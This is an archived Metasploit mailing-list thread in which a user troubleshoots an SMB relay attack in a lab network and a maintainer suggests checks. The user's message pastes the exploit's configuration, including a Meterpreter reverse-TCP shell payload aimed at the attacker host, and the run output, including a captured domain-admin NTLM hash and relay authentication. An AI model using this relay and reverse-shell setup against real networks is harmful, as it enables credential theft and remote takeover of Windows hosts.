Metasploit mailing list archives
Re: SMB_RELAY attacks still possible?
From: Kurt Grutzmacher <grutz () jingojango net>
Date: Fri, 24 Dec 2010 23:53:13 -0500
Hi Brian, SMBRELAY attacks should still work depending upon your negotiated NTLM settings and what is currently supported within Metasploit's library. Can you confirm that metasploit to DC works via smb_login or psexec? If yes then SMBRELAY really should work. What version of Windows is your DC running? -- Kurt Grutzmacher -=- grutz () jingojango net On Fri, Dec 24, 2010 at 3:25 PM, Epic <epicdonk () gmail com> wrote:
I should also note, that I have confirmed it is possible to go from 192.168.0.2->\\192.168.0.1\ADMIN$ manually using the currently logged in credentials. On Fri, Dec 24, 2010 at 1:22 PM, Brian S Traveling <epicdonk () gmail com>wrote:Hi, Is it possible to still carry out smb_relay attacks by specifying a different SMBHOST? It doesn't seem to be working for me... I was under the assumption it was still possible... my test environment: domain controller: 192.168.0.1 (also dhcp/router) windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to domain) metasploit box: 192.168.0.35 (not joined to domain) msf exploit(smb_relay) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SMBHOST 192.168.0.1 no The target SMB server (leave empty for originating system) SRVHOST 192.168.0.35 yes The local host to listen on. SRVPORT 445 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST 192.168.0.35 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(smb_relay) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.35:4444 [*] Server started. msf exploit(smb_relay) > [*] Received 192.168.0.2:62573 MYDOMAIN\domainadmin LMHASH:000000000000000000000000000000000000000000000000 NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000 OS: LM: [*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin... [*] AUTHENTICATED as MYDOMAIN\domainadmin... [*] Connecting to the ADMIN$ share... [*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) /opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'(eval):133:in `smb_haxor'(eval):530:in `smb_cmd_session_setup'(eval):332:in `smb_cmd_dispatch'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'/usr/local/bin/msfconsole:124/SMBRelay Thanks!_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- SMB_RELAY attacks still possible? Brian S Traveling (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)
- Re: SMB_RELAY attacks still possible? Kurt Grutzmacher (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)